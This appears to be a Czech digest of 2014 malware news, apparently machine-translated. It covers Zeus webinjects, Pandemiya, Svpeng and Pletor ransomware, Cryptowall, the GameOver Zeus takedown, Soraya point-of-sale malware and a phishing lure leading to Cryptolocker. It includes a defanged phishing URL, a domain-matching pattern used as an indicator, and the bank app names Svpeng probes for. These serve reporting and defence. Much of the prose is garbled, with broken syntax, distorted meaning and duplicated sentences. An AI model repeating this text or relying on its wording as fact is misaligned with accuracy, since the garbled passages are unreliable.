z nich hledají přihlašovací údaje pro cloudových služeb, které existují mimo bezpečnostní pozici z mnoha organizací, ale stále nabízí šířku pásma a výpočetní výkon pomoci zahájit další útoky, stejně jako nabídka krytí. PLXSert tvrdí, že byl pozorován známých cloudových služeb dodavatelů mezi zdroji mnoha DDoS kampaní. "Útočníci používají konfiguraci webinjects přizpůsobit útoky pro specifické aplikace cloud-based", PLXsert poznámky. "Tato funkce je komerčně v podzemí - škodlivé herci prodávat přizpůsobené Zeus webinjects pro tyto účely. V minulosti, webinjects byly přizpůsobené speciálně pro bankovní stránkách. Webinjects jsou nyní upraveny cílit na konkrétní webové aplikace. " Jak tyto vlastní sady krást přihlašovací údaje od a sledovat používání internetu pro firemní klientelu, se útočníci nevyhnutelně najít způsoby, jak by byla ohrožena těchto organizací v pořadí. V laboratorním prostředí, PLXsert byl schopen nasadit vlastní webinjects nenápadně upravovat HTML webové stránky s nebezpečným obsahem na míru polích zobrazených uživatelům, aby se oklamat ty uživatele na poskytování osobních údajů a citlivých pověření. Když, nebo pokud uživatel poskytuje tyto informace v tomto laboratorním prostředí nebo v reálných situacích, rámcové Zeus převody a indexy cenné informace, které mohou být přístupné útočníky později. Hledat schopnosti v novějších nástrojů Zeus dát útočníkům schopnost identifikovat uživatele, kteří přístupné webové stránky a aplikace konkrétních společností nebo cloud poskytovatelů služeb. Útočníci, zpráva vysvětluje, pak může vytvořit své vlastní webinjects a skripty k útoku těchto stránek. PLXsert říká, že očekává další úpravy a vylepšení na Zeus malware toolkit, včetně hybridních užitečné zatížení s jinými crimewaru sad zaměřených na více platforem, včetně Windows, Mac, Linux, Android a iOS. Mnoho z vlastních odrůd Dia stále pověření-zloděje.
Nový Pandemiya bankovnictví Trojan Scénář From Scratch 12.6.2014 Viry Zcela nový, psaný-z-nuly malware je poměrně vzácný podnik v metru. Kromě některých soukromých snah, zdrojový kód je k dispozici pro řadu populárních trojské koně, včetně Zeus, Citadela a Carberp , takže je snadné pro útočníkům jednoduše chytit jednu z regálu a můžete začít. Tyto tři byly zejména upraveny znovu a znovu, posilující nepovolené pověst bankovních trojských koní.
To je nedávný objev nového bankovního Trojan o to více stojí za zmínku. FraudAction tým RSA Security vydala zprávu o Pandemiya, Trojan, který se prosazuje v hackerských fórech jako alternativu k bankovním Zeus Trojan a jeho mnoha variantách.
Trojan se prodává za jak hodně jak $ 2000 Kč a nabízí mnoho stejných funkcí, které dobře-známý bankovní malware, které poskytuje, včetně šifrovanou komunikaci s velitelských a řídících serverů s cílem ztížit detekci a analýzu. Trojan je také modulární konstrukci; jeho schopnost k načtení externích plug-inů, RSA uvedl, umožňuje hackerům přidat nové funkce jednoduše tím, že píše novou DLL. Plug-iny snadno přidat funkce pro základní funkčnost Trojana.
RSA uvedl, že autor strávil rok psaní Pandemiya, která obsahuje 25000 řádků původního kódu napsané v jazyce C.
"Z mé zkušenosti, to není velmi běžné v počítačové trestné činnosti průmyslu narazí na zcela originální kus škodlivého kódu; většina škodlivého kódu spisovatelů spoléhají a opětovné použití dříve unikly zdrojové kódy, "řekl Uri Fleyder, počítačová trestná činnost výzkumná laboratoř manažer RSA. "Například, Zeus a Carberp unikly zdrojové kódy (nebo jejich části) jsou silně znovu použít v mnoha Počítačová kriminalita související Trojan varianty. "
Zda tento trend získává veškeré trakční medvědy sledují ve světle nedávné takedown na GameOver Zeus botnet. Zda tento trend získává veškeré trakční medvědy sledují ve světle nedávné takedown na GameOver Zeus botnet, botnetu peer-to-peer šíření bankovní malware a Cryptolocker Ransomware. I když tato varianta nemá žádný vztah k GameOver Zeus nebo jeho takedown, tyto kousky malware jsou dobře známy výzkumníků a nástroje pro detekci signatur na bázi.
"Podle mého názoru je hlavním důvodem k napsání nového škodlivého kódu zcela od nuly, je, aby se vyhnula koncovým bodem založených řešení na ochranu bezpečnosti," řekl Fleyder. "Většina bezpečnostních produktů pro koncového bodu zařízení se opírají o již známých podpisy a dříve známých vzorců chování. Je to těžší (z jejich point-of-view), které zjišťuje a blokuje nové hrozby, které se chovají odlišně od všech dosud známých ty. "
Pandemiya obsahuje řadu základních funkcí, které jsou společné pro většinu bankovní malware, včetně webových vstřikuje a forma-grabbers pro tří hlavních prohlížečů, stejně jako souborový grabber, nakladače a schopnosti k digitálnímu podepisování souborů je chránit nejen z detekce podle bezpečnostních výzkumníků, ale také z jiných zločinců. Komunikace s příkazem a ovládacího panelu je také šifrována.
Další plug-iny, k dispozici 500 dolarů, patří reverzní proxy, FTP Zloděj a přenosné spustitelný soubor (PE) infikuje vnést malware při spuštění. Další moduly plug-in na cestě, Fleyder řekl, obsahovat zpětný skryté RDP a Facebook rozmetadlo, které používá kradené Facebook pověření vybírá Trojan a poštou a šíření škodlivých odkazů na přáteli na Facebooku.
"Mnoho trojských koní v dnešní době jsou pomocí sociálních sítí (v minulosti, většina z nich jsou závislé na instant messaging služby, jako je ICQ a Windows Messenger) jako šířící mechanismus, který využívá lidský řetěz důvěry (" přátelé "v sociálních sítích)," řekl Fleyder. "Je to klasický příklad sociálního inženýrství."
Malware se šíří využívat výstroje, bít do počítače pomocí drive-by download útoky. Malware obsahuje háčky pro řadu běžících procesů, které se používají ukrást prohlížeč provozu, formulářová data HTTP a přihlašovací údaje. Je také možné vzít screenshoty a provádět vyhledávání souborů a komprese, aby se krást soubory.
"Z mé zkušenosti, technika, která spisovatel Pandemiya Trojan zvolil pro vstřikování svůj škodlivý kód do každého nového procesu (instalace příspěvek) není velmi běžné pro tento typ hrozeb," řekl Fleyder.
Do té doby, hra na kočku a myš pokračuje mezi donucovacími orgány a hackery, kde úřady tvrdí, vítězství přes botnet takedowns , a zločinci reagovat s originálním hrozbou.
"Předchozí takedown úsilí neměl dlouhotrvající vliv na motivaci podvodníci" ukrást nedovolených prostředků, "řekl Fleyder. "Myslím si, že škodlivý kód spisovatelé může snížit, že profil, zmrazit některé projekty a jít do podzemí po dobu několika dnů až týdnů, jsou však vždy vrací nakonec."
Údajné Oleg Pliss iPhone Hackeři zatčen v Rusku 12.6.2014 Viry Hackeři stojí za iPhone Ransomware kampaně minulý měsíc - ve kterém mnoho Uživatelé byli dozatováni zaplatit 100 dolarů na odemknutí jejich zařízení - může být za mřížemi teď.
Tisková zpráva na internetových stránkách ruského ministerstva vnitra v včerejšího tvrdí dva muži byli nedávno zatčeni za "blokování zařízení Apple vynutit prostředky," je systém, který se hodí na popis toho, co se stalo minulý měsíc. Na konci května metla ransomware zasáhla stovky iPhone a iPad Australané ", který domnělý pocházet z Oleg Pliss. Útočníci uzamčen uživatelům z jejich zařízení, pokud by souhlasil, že zaplatí 100 dolarů.
Oznámení tvrdí, že dva nejmenovaní obyvatelé jižní správní obvod v Moskvě, jeden narozený v roce 1991 a jeden se narodil v roce 1998, byly nedávno zadrženo. Jeden z údajných hackerů byla v minulosti zkoušela podle ministerstva. Verze tvrdí, že ministerstvo začalo přijímat zprávy počátkem jara "dálkové blokování mobilních a stacionárních zařízení [Apple]" a "poštovní seznam zpráv náročných peníze" nebo jiného data budou zničena ze zařízení.
Podle ministerstva se zločinci používají dva "dobře zavedené systémy."
Jedním z nich byl hacking "e-mailové účty a komplikované phishingových stránek sbírat obětí uživatelů Apple pověření ID. Druhý systém - který může, ale nemusí souviset s Oleg Pliss podvod - ". Různých internetových zdrojů k vytvoření reklamy" údajně vázané prostředky do předem dohodnutých účtech a použitých Tyto reklamy slíbil, přístup k Apple ID účtů, které obsahovaly "velké množství multimediálního obsahu . "Jakmile někdo přijal nabídku a souvisí jejich zařízení na účet, útočníci unesli zařízení.
Ministerstvo tvrdí, že prohledali byty žalovaných a zmocnili počítačového vybavení, SIM karty a telefony, které byly použity v "ilegálních aktivit," spolu s literaturou o hackování počítačových systémů.
Dva dal přiznání a očekává se, že bude obviněn z neoprávněného přístupu k počítačovému informace podle článku 272 trestního zákoníku , podle úřadů.
Před dvěma týdny iPhone a iPad uživatelům v Austrálii a na Novém Zélandu probudil hlasitý Find My iPhone oznámení ping. Když se podíval na svých obrazovkách viděli zprávu, že tvrdil, jejich zařízení bylo "Hacked by Oleg Pliss." Zpráva rovněž požadovala uživatelům posílat poukaz na $ 100, přes on-line převod peněz místě, aby odhalili jejich zařízení.
Je to stále ještě není zcela jasné, kdo nebo co Oleg Pliss je - Ruské úřady by nebylo úplně dělat, že spojení - ale zní to docela dobře možné, že muži ve vězení, mohli být za kampaň, nebo snad kapela napodobitele hackerů.
To bylo zpočátku myslel, že iCloud, cloud storage služby společnosti Apple, byla ohrožena, protože útočníci byli schopni posílat upozornění pomocí funkce Find My iPhone, ale v prvních dnech po útocích Apple trval na tom, že to není tento případ .
Společnost Cupertino bázi se však nutkání postižené uživatele, aby co nejdříve změnit své Apple ID hesel a varoval, že opětovné heslo - uživatelé, kteří používají svůj iCloud heslo pro jinou službu - by mohlo být na vině.
Poslední verze Svpeng zaměřeny na uživatele v USA 12.6.2014 Viry
Téměř před rokem jsme psali náš první blog o mobilní Trojan Svpeng. Tehdy, první dojem byl, že je to standardní třídy Trojan-SMS škodlivý program, který ukradl peníze z SMS bankovních účtů.
Později jsme zjistili, že zločinci se zdokonalil funkčnost Trojan a to už začal napadat mobilní bankovnictví uživatelů, zejména zákazníkům tři z největších ruských bank. Svpeng bude čekat, dokud uživatel otevřel online bankovnictví aplikaci a poté ji nahradit vlastní ve snaze získat uživatelské jméno a heslo oběti. Trojan se také pokusil ukrást údaje o bankovním karty zobrazením vlastní okno na horní část Play aplikace Google a požaduje informace o zločinci chtěli.
Potom, na začátku roku 2014, jsme zjistili novou úpravu Svpeng s možností Ransomware. Když pokynů svého serveru, malware se pokusil zablokovat telefon uživatele a zobrazí se zpráva požadující zaplacení 500 dolarů "poplatek" za údajné trestné činnosti.
Nicméně, že funkčnost rychle zmizel z nové verze Svpeng. Ukázalo se, že zločinci stojí za malware se rozhodla posílit ji a uvolněte jej jako samostatný Trojan. Během této doby se původní verze Svpeng i nadále vyvíjet a infikovat nové uživatele, se ruský mobilní bankovnictví zákazníci zbývající do cíle.
Ale na začátku června jsme identifikovali nový spin-off verzi Trojan. Zatímco hlavní verze cílené Rusko, 91% nakažených v nové verzi byly v USA. Malware také napadl uživatele ve Velké Británii, Švýcarsku, Německu, Indii a Rusku.
Tato nová Svpeng je typický kus ransomware. Po spuštění se napodobuje kontrolu telefonu ...
... A, samozřejmě, že najde nějaký nepovolený obsah.
Malware pak blokuje telefonu a vyžaduje platbu ve výši $ 200 až jej odblokovat. Také zobrazuje fotografie uživatele přijatých předním fotoaparátem telefonu, v chování, který je téměř totožný s tím nedávno zjištěné Trojan-Ransom.AndroidOS.Pletor.a .
Tvůrci Trojan přijímat MoneyPak poukazy na platby výkupného - Svpeng ochotně informuje oběti, kde lze zakoupit ve Spojených státech.
Pokud jde o Ransomware trojské koně, nová úprava Svpeng vyniká zcela nové provedení standardních funkcí - IT zcela blokuje mobilní zařízení, dokonce dělat to nemožný pro vyvolání menu vypnout nebo znovu přístroj. Oběť může přístroj vypnout stisknutím tlačítka zapnutí / vypnutí po dobu několika sekund, ale Trojan okamžitě začne pracovat, jakmile je přístroj opět zapněte.
Podařilo se nám identifikovat sedm úpravy nového Svpeng, a všechny z nich obsahovat odkaz třídy Cryptor, ale žádný z nich dělá jakýkoli pokus o jeho použití. To by mohlo znamenat, že v budoucnu budou zločinci používají Trojan šifrování uživatelských dat a požadovat výkupné ho dešifrovat.
Stejně jako všechny Ransomware funkčnost, tyto verze mají jiný rozlišovací znak. Trojan kontroluje, zda jsou tyto aplikace nainstalované v systému:
com.usaa.mobile.android.usaa com.citi.citimobile com.americanexpress.android.acctsvcs.us com.wf.wellsfargomobile com.tablet.bofa com.infonow.bofa com.tdbank com.chase.sig.android com.bbt.androidapp.activity com.regions.mobbanking To pak načte výsledky kontroly na server kybernetických zločinců. Jak vidíte, seznam obsahuje aplikace, které nabízí velkých amerických bank pro mobilní bankovnictví. Mezi zločinci jsou pravděpodobně jen shromažďování statistických údajů o používání těchto aplikací na infikovaných zařízení. Vzhledem k tomu, že Svpeng je, v první řadě, bankovnictví Trojan, můžeme očekávat, že útoky na klienty těchto bank, kteří používají mobilní aplikace pro správu svých účtů.
Věnujte pozornost Cryptowall! 11.6.2014 Viry
CryptoLocker může být do značné míry mimo radar. Ale Cryptowall je čile k světu, a dělat protivníci ton peněz. Šíří se hlavně otrávené reklamy a hacknut benigní webové stránky, a pak se plíží svou cestu do počítačů nic netušících uživatelů pomocí Silverlight, Flash a Java využije.
Poněkud neočekávaně, Java NENÍ nejvýznamnější pro změnu. Vypadá to, že Silverlight sploits jsou v současné době nejúspěšnější.
Pokud jste "měl", Cryptowall šifruje všechny soubory, které jste možná mohl chtít, aby se (obrázky, dokumenty, atd.), a pak se zeptá na 500 $ výkupné. Pokud nechcete zaplatit rychlé, výkupné zdvojnásobí. A po chvilce neplatí, dobře, přísavky odstraňte klíč. Pokud je nám známo, není ještě způsob, jak obnovit zašifrovaná data, protože soukromý klíč není skutečně přítomen na infikovaný počítač. Doufám, že máte aktuální zálohu.
Minulý týden šarže infekcí například měl "food.com" jako významného zdroje. Pokud mohu říci, že jsou vyčištěna teď, ale máme několik vzorků v databázi, které ukazují stránek, jako je http://www.food [dot] com/recipe/pan-fried-broccoli-226105, http: / / www.food [dot] com/recipe/barefoot-contessas-panzanella-salad-135723, atd., jako poslední referer před činem vyvolal.
Domény minulý týden bylo po vzoru [-f0-9] {6,8} \. Pw a [-f0-9] {6,8} \. Eu, ale to se samozřejmě neustále mění. Přesto, to asi není na škodu zkontrolovat DNS nebo serveru proxy protokoly pro přítomnost (zejména). PW domén. Ano, musel jsem se podívat to stejně .... pw je Palau. Banda ostrovů v jižním Pacifiku. Je bezpečné předpokládat, že většina webových stránek s touto příponou, nejsou ve skutečnosti o nebo v Palau.
Více informací: Ronnie má vynikající zápisu-up na http://phishme.com/inside-look-dropbox-phishing-cryptowall-bitcoins/. Cisco blog má hodně IOCs: https://blogs.cisco.com/security/rig-exploit-kit-strikes-oil
Android Ransomware První Šifrování dat na mobilních zařízeních 9.6.2014 Viry Kmen ransomware, která šifruje data na Android mobilní zařízení , první svého druhu, se rozšířila do 13 zemí, protože to bylo poprvé spatřen před méně než měsíc.
Výzkumníci z Kaspersky Lab dnes zveřejněny podrobnosti o Pletor, drahé Trojana, které se objevilo až na podzemní fóru prodej za $ 5,000. Ransomware, detekován jako Trojan-Ransom.AndroidOS.Pletor.a, napadl více než 2000 strojů v prvé řadě Rusku a na Ukrajině, ale i dalších evropských a asijských zemí. Vrchol infekcí, výzkumník Roman Unuchek řekl, přišel 22. května, kdy bylo hlášeno 500 nových infekcí.
Malware je napadení zařízení používaná k návštěvě falešné pornografické webové stránky; Trojan se tváří jako multimediální přehrávač, potřebné k zobrazení videa na stránkách. Je to také šíří ve hrách a jiných aplikací pro Android, stejně jako ruský mobilní telefon fórum, řekl Unuchek.
"Pokud je váš smartphone byl napaden [Pletor], doporučujeme, abyste neplatili zločince," řekl Unuchek. "Všechny verze Trojans, které jsme viděli obsahují klíč, který může být použit pro dešifrování příslušné soubory."
Pletor se chová podobně jako jiné šifrování ransomware, jako CryptoLocker, v tom, že uzamkne soubory a data na zařízení, dokud není zaplaceno výkupné, jinak zločinci slibují údaje nikdy nebudou načteny.
Tento konkrétní Trojan byl upraven více než 30 krát. Tento konkrétní Trojan, nicméně, byl upraven více než 30 krát. Unuchek řekl malware komunikuje se servery hackerů buď přes anonymita sítě Tor, nebo přes HTTP a SMS. Jsou-li zařízení uživatelů infikovaných SMS nebo HTTP verze Pletor, bude malware zobrazí snímek pořízený s přední kamerou smartphone.
Oběť je pak prezentovány s upozorněním, že jejich zařízení bylo zamčené a šifrované, protože uživatel je obviněn z prohlížení zakázaných typů pornografie. Malware používá šifrování AES pro šifrování obsahu paměťových karet v telefonu; především se zaměřuje multimediální soubory a dokumenty, jako jsou. jpg,. bmp,. doc,. MP4 a mnoho dalších.
"Okamžitě Trojan-Ransom.AndroidOS.Pletor.a zobrazuje požadavky výkupného," řekl Unuchek. "Všechny úpravy Trojan, který jsme našli zobrazena zpráva v ruštině a byly zaměřeny na uživatele, ve dvou zemích: v Rusku a na Ukrajině."
Výkupné je relativně nízká; 1000 až 1200 rublů, nebo mezi $ 30 a 35 dolary. Platba je požadováno přes digitální služby, jako je QIWI VISA WALLET nebo MoneXy.
Zhruba ve stejné době Pletor vynořil v podzemních fórech, další kus Android ransomware vynořil. Prodáno stejnou skupinou, která se vyvíjela Reveton na plochu, tento kus malware zámky zařízení, ale není šifrování jejich obsah. Oběti se nakazí, když používají své zařízení k návštěvě webu, který je hostitelem škodlivého softwaru. Oni jsou přesměrovány na pornografické stránky, kde oni lákaly ke stažení porno aplikaci, která obsahuje Ransomware.
Migrace ransomware z počítače do mobilních zařízení je pozoruhodné orgány a výzkumníci zabezpečení, který právě minulý týden provedla Takedown infrastruktury, který je hostitelem GameOver Zeus botnet , který byl použit k distribuci Cryptolocker Ransomware na stolních počítačích. Během dvou dnů, objem paketů odeslaných GOZ infikovaných strojů klesl téměř na nulu.
efax Spam obsahující malware 9.6.2014 Spam, Viry
Dejte si pozor na efax, které mohou přijít do vaší e-mailové schránky. Tento týden jsem obdržel svůj první efax spam se zdrojovou adresou "faxové zprávy [message@inbound.efax.com]", který obsahoval odkaz na www.dropbox.com, která obsahovala malware. Odkaz má protože been vzdálený.
efax Spam
Na stránkách eFax je, naznačují, že dostáváte fax spam předložit faxu pomocí do on-line formuláře a oni "se pokusí, aby se zabránilo dalšímu šíření nevyžádané faxy od zdroje. [ 2 ]
Padl další botnet, ransomware Cryptolocker byl zablokován
9.6.2014 Viry Likvidace jednoho z největších globálních botnetů podle bezpečnostních expertů ochromila distribuci jednoho z nejsofistifikovanějších škodlivých kódů současné doby s názvem Cryptolocker.
Jak podotýkají bezpečnostní experti, kyberzločinci však nelení a již připravují za Cryptolockera náhrady. „Od minulého pátku jsme nezaznamenali žádnou novou aktivitu a žádné nové infekce,“ uvedl bezpečnostní analytik Dell SecureWork Counter Threat Unit (CTU) Keith Jarvis s odkazem na likvidaci dva roky starého botnetu Gameover Zeus, jež byla americkými úřady oznámena v pondělí. Gameover Zeus byl jediným distribučním kanálem pro Cryptolocker. A s Jarvisovým závěrem souhlasí i jiní experti.
„Podle našich údajů počet zařízení infikovaných Cryptolockerem značně poklesl a je v současné době poměrně stabilní okolo nuly,“ uvedl šéf dánské společnosti Heimdal Security Morten Kjaersgaard. V pondělí americké ministerstvo spravedlnosti zveřejnilo, že spolu s úřady z Austrálie, Německa, Francie, Japonska, Ukrajiny a Velké Británie získali kontrolu nad botnetem Gameover Zeus a údajný provozovatel sítě byl vzat do vazby.
I když se počet infekcí Cryptolockeru snížil, kyberzločinci již pracují na nových hrozbách. Podle Jarvise jej v nejbližší době nahradí Cryptodefense a Cryptowall, které jsou na internetu již od konce minulého roku. Tyto aplikace po infiltraci systému zašifrují data na počítači a snaží se přesvědčit uživatele, aby za jejich dešifraci zaplatil. Tento typ útoku je ve větší míře provozován od roku 2005. A nejúspěšnější z nich bych Cryptolocker.
Jarvis uvedl, že podle společnosti SecureWorks – která Cryptolocker analyzuje již od jeho počátků a byla jednou z mála soukromých firem, jež asistovaly vládním agenturám při rozplétání informací o botnetu Gameover Zeus – vydělal Cryptolocker svým tvůrcům minimálně deset milionů dolarů. Některé oběti, které odmítly zaplatit, měly vážné problémy při obnově svých dat. Během vyšetřování americké úřady zpovídaly řadu obětí a zjistily, že firmy za obnovu dat platily v rozmezí 30 do 80 tisíc dolarů.
Podle Jarvise vděčí Cryptolocker za svůj úspěch především svému sofistifikovanému kódu – zejména použitému šifrování. „Je to velmi dobře napsaný software,“ uvedl Jarvis. „Nejsou v něm žádné díry ani chyby. Jiné podobné kódy měly šifrování, které bylo možné prolomit – ne však Cryptolocker.“ Podle Jarvise byla skupina stojící za botnetem Gameover Zeus vysoce profesionální a tvořili ji zkušení programátoři napojení na propracované distribuční kanály a kvalitní infrastrukturu.
GameOver Zeus Takedown vykazuje dobrou Early Returns 4.6.2014 Viry Účinek takedown na GameOver Zeus botnet tento týden bylo okamžité a významné. Vědci, kteří sledují aktivitu činnosti botnet je peer-to-peer říci, že objem paketů odeslaných z infikovaných počítačů klesl téměř na nulu.
V pátek, FBI a Europol, spolu s výzkumnými pracovníky z několika bezpečnostních společností, provedla Takedown na GOZ botnet, která zahrnovala zadření servery zapojené do provozu botnet a sinkholing některé z domén útočníci využívají pro komunikaci. GOZ je P2P odnož hlavní Zeus malware rodiny, který je speciálně navržen tak, aby krást finanční pověření obětí a pak je použít k podvodným převodům. Je to velký problém pro finanční instituce za pár let, a úřady v USA a Evropě spojili své zdroje k poklesu kladivo na provozovatele botnetu.
Úřady v USA a Evropě spojili své zdroje k poklesu kladivo na provozovatele botnetu. FBI je účtován Evgeniy Michajlovič Bogachev, ruským státním příslušníkem, s několika zločinů v souvislosti s jeho údajnou účast v GOZ botnet. Se všemi botnet takedowns, existuje celá řada různých cílů. Vědci a dotčené společnosti a oběti chtějí malware zabil a provoz dusil off. A úřady chtějí lidé podílející se na provozu zatčen a stíhán. V případě GOZ, jeden z těchto cílů již bylo dosaženo.
Výzkumníci z CERT Polska, polské Emergency Response Team počítače, které byly sledovat provoz vycházející z infikovaných GOZ strojů a jejich statistik vyplývá, že provoz úplně vysadil na stůl pozdě v den 30. května, zhruba v době, kdy došlo k zastavení šíření. Dopravní znovu špičatý následující den, ale klesla téměř na nulu znovu od té doby.
V předchozích botnet takedowns, sítě někdy přišli zpět k životu v jiných formách, nebo pomocí různých infrastruktury. P2P botnety může být zvláště obtížné zcela odstranit, protože jejich distribuované C2 infrastruktury, který umožňuje operátorům tlačit příkazy k infikovaných počítačů a pak je mohou sdílet mezi sebou. Tradiční shora dolů botnet architektury vyžadují, aby každý bot v doprovodu C2 serveru přijímat příkazy.
Vědci podílející se na GOZ takedown řekl, že operace byla provedena ještě obtížnější, protože provozovatelé botnet vzal obranných opatření na ochranu jeho průběhu let.
"V prvních dnech, GameOver Zeus byl cíleny především na finanční instituce v USA. Během svých let provozu botnet brzy rozšířenou cílovou seznamu zahrnout finanční instituce v Evropě a Asii stejně. Například, v roce 2013 švýcarské uživatelů internetu byly zasaženy spam běhu, který byl distribuci GameOver Zeus ve Švýcarsku , "řekl výzkumník, který provozuje Abuse.ch ve Švýcarsku.
"GameoOver Zeus botnet byl vyvinut další několikrát, hlavně zaměřena na zpevnění P2P složku GameOver Zeus. Hlavním důvodem pro to bylo několik takedown pokusy prováděné podle bezpečnostních výzkumníků v minulých letech. "
Gameover Zeus a Cryptolocker takedowns
3.6.2014 Viry
Do teď mnozí jste již četl zprávy o Brian Krebs na GameOver Zeus (GOZ) a Cryptolocker takedowns (nebo zpřesnění, přerušení). Můžete si přečíst na ministerstvo spravedlnosti v americké soudní dokumenty zde , které obsahují pojmenované podezřelého za provozu GOZ. To je výsledkem rozsáhlé spolupráce v oblasti vymáhání práva a multijurisdictional práce ze soukromého sektoru. TL, verze DR je, že od této chvíle, Gameover Zeus byl narušen a již nemohou kontrolovat klienty. V případě Cryptolocker nové oběť stroje jsou již komunikovat s řídící a kontrolní (C2S), servery, které znamená, že soubory nebudou zakódovány. Pokud se vaše soubory jsou již šifrována, to není změna, jak se kdysi soubory jsou šifrovány neexistuje žádná jiná komunikace, která je nezbytná s C2S, pokud budete platit výkupné. To, bohužel, je pravděpodobné, že dočasný charakter (od 2 týdnů a 6 měsíců v závislosti na konkrétních okolnostech).
Jedna věc, která by mohla být užitečná, je, že pokud budete dodržovat nových infekcí GOZ nebo Cryptolocker, prosím, napište do podrobnosti, takže mohou být analyzovány.
Díky!
Soraya Malware balíčky formulář popadat, Memory Škrábání funkce 3.6.2014 Viry Malware schopen infikovat point-of-prodej zařízení jednou bylo novinkou, ale je to rychle stává běžnější. Výzkumníci z Arbor Networks objevili nový kmen PoS malware s názvem Soraya, která může seškrábat paměť a má schopnost zachytit informace odeslané z webových formulářů, specialita Zeus malware rodiny.
Soraya má také některé podobnosti starší Dexter malware , který infikuje pokladních systémů a má funkci paměti škrábání, stejně. Stejně jako Dexter, Soraya má schopnost krást informace o platebních karet z paměti a odešle tato data pryč ke vzdálenému C2 serveru. Útočníci obvykle používají tato data ke klonování kreditních karet a spustit až podvodné poplatky za účty obětí.
Výzkumníci z Arbor Networks nedávno provedla analýzu nové Soraya malware a jeho infrastruktury, a zjistil, že posádka za sebou má již ohrožena tisíce čísel platebních karet, více než 65 procent z nich jsou ze Spojených států.
Více než 65 procent z odcizených platebních karet jsou ze Spojených států. Příští největší pás postižených karet byly vydány v Kostarice.
"Jeden závit na systému je zodpovědný za škrábání paměť pro údaje o kreditní kartě. Je to tím, že vytvoří mutex POSMainMutex aby bylo zajištěno, že je jen závit provozu. Každých 5 sekund, vlákno bude iterovat v seznamu procesů s Process32Next () , ignoruje systémové procesy s názvy jsou uvedeny v obr. 1.. To bude kontrolovat oblasti paměti pro každý proces s VirtualQueryEx () , ignoruje ty s PAGE_NOACCESS nebo PAGE_GUARD hodnoty nastavené . Platné oblasti paměti jsou zkopírovány s ReadProcessMemory () a zkoumal dat platebních karet. Dexter malware rodina používá podobnou techniku, "Matthew Bing z Arbor Networks napsal podrobnou analýzu tohoto malwaru.
"Soraya bude testovat paměť pro vzorky odpovídající platné údaje platební karty. Nepoužívá běžné expresssions, ale odpovídá formátu kód "B", vzory číselných řetězců, a standard "^" oddělovač, jak jsou definovány v ISO / IEC 7813 . Jedním jedinečný aspekt Soraya je, že se používá algoritmus Luhn identifikovat platné kreditní a debetní karty čísla, nová technika pro paměti škrábání point-of-prodej malware. Luhn algoritmus využívá jednoduchý kontrolní součet přes čísla kreditních karet, aby se zajistilo, že jsou platné. Stopa 1 a Stopa 2 data jsou zabaleny a odeslány do velení a řízení (C2) webu pomocí protokolu popsáno níže jako "režim 5" zprávy. "
Soraya malware má několik různých režimů a režim 5 pokyn malware poslat zachyceného Track 1 a Stopa 2 data zpět do C2 serveru.
Malware, jako Soraya a Dexter, který může krást data z paměti, jsou relativně nový vývoj v PoS malware světě. Tradiční techniky pro krádeže dat z POS zúčastněných fyzických skimmer zařízení, které zachycené informace o skladbách jako karta vložena. Ale malware, který může žít na POS terminálech samotných umožňuje útočníkům být méně dotěrný s jejich činností. Memory škrábání malware v tomto směru byla použita jako součást cílové porušení a bylo zjištěno, v jiných maloobchodních útoků, stejně.
Na webové straně, Soraya může chytit dat z platebních karet z forem, jak oni jsou předloženy na stránky, něco, co Zeus malware rodina má k dokonalosti v průběhu let. Kombinace PoS paměti škrábání funkce a funkce formuláře-popadat je Soraya něco nového na malware krajinu, řekl Bing.
"Soraya jasně vzít inspiraci z Dexter a rodiny Zeus. "Rozdělit mozek" funkčnost i paměti škrábání a formuláře zabírání je Soraya je nejvíce jedinečný rys. V minulých kampaních, paměťové škrabky byly jednoznačně zaměřeny na point-of-prodej zařízení a forma grabbers byly jednoznačně zaměřeny na on-line uživatelů bankovních, "řekl.
Facebook nabízí bezplatné prohlížeče na bázi malware skener 30.5.2014 Sociální sítě, Viry Lidé sdílet prostřednictvím sociálních médií, více než kterýkoli jiný kanál. Ale sociálních médií využije osobních a firemních účtů často dělat titulky, je čas na nové způsoby, jak chránit digitální identity spotřebitelů. Díky technologii F-Secure je, bude Facebook nabízet na bázi prohlížeče malware skener jako bezplatnou službu. Tato služba bude k dispozici na Facebooku uživatelům, jejichž účet byl dočasně zmrazeny kvůli podezřelé aktivitě způsobené potenciální malware infekce. Malware nebo nežádoucí software v počítači nebo v zařízení, mohou narušit normální výkon zařízení, ukrást osobní informace, nebo získat přístup k systému . To může zneužít Facebook uživatele a jejich přátele tím, že vysílání škodlivé odkazy a spamu, které se zdají pocházet z účtu oprávněný uživatel je. "Pomáháme lidem zůstat v bezpečí na Facebooku je velmi důležitou součástí toho, co děláme, a my jsme rádi, že se přidá sílu F-Secure Anti-Virus technologie našich stávajících systémů pro blokování a odstranění malware, "řekl Chetan Gowda, softwarový inženýr na Facebooku. malware skenování a čištění technologie F-Secure je plně integrována do uživatelského prostředí Facebooku. Při Facebook identifikuje účet chová podezřele, bude přesměrovat uživatele na procesu vyčištění. skenování a čištění se provádí přímo v okně prohlížeče, uvnitř Facebooku. . Po vyčištění je kompletní, může uživatel bezpečně přihlásit do svého účtu na Facebooku, v bezpečí před hackery a spywarem Zde je návod, jak bude tento proces fungovat:
Pokud je uživatel přihlášení z infikovaného zařízení, uvidí oznamovací obrazovku o malware infekce spolu s doporučením používat F-Secure je skener. Skener je vhodný na typu zjištěné hrozby, takže je doporučeno spustit, i když je zařízení již má anti-virus program nainstalován. Skener je up-to-data a odstraní se jednou udělal běží, takže není třeba se starat o údržbu. Uživatel si může vybrat přeskočit malware proces odebrání nebo stáhnout doporučené skener. Uživatelé, kteří přeskočit na malware krok odstranění mohou být vyzváni znovu později. Uživatelé, kteří stáhnout a spustit skener může nadále používat Facebook a další služby během kontroly. Když je skenování dokončeno, bude uživatel dostávat oznámení prostřednictvím Facebooku a budou moci prohlédnout výsledky testu.
Fake Australský Electric Bill vede k Cryptolocker
30.5.2014 Viry
Náš čtenář Marek nám poslal odkaz se vzpamatoval z podvodných e-mailů. Nemáme na e-mail hned, ale webová stránka přináší malware je docela zajímavé samo o sobě.
E-mail tvrdí, že pochází z "Energy Australia", skutečné australské energetické společnosti, a odkaz vede na:
hxxp :/ / energymar.com / data / elektřina / view / get / energy.php? eid = [dlouhé číslo]
Poznámka poněkud pravděpodobný název domény (energymar.com). Skutečný název domény pro energetickou Austrálii je "www.energyaustralia.com.au".
Na první obrazovce prezentovány uživateli požádá uživatele o řešení velmi jednoduchý CAPTCHA. Toto je pravděpodobně zavedeny bránit automatickou analýzu URL:
Malware Captcha
